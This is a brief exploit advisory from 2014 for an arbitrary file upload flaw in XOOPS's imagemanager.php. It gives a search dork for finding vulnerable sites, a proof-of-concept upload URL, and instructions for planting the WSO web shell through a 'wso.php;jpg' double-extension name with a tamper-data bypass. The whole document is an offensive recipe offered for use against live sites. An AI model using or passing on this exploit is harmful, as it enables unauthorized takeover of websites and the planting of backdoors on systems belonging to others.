facebook facebook twitter rss

XOOPS Arbitrary File Upload

Author: bRpsd , Published: 13-08-2014
Script = XOOPS
TYPE = Arbitrary File Upload
Dork = inurl:imagemanager.php?target=
Founder ; bRpsd =P
Skype; vegnox

Poc :
http://site.com/imagemanager.php?target=user_sig&op=upload&imgcat_id=1

Upload shell (Tamper data Bypass Required) ..
wso.php;jpg
Congratulation! ..

Like us on Facebook :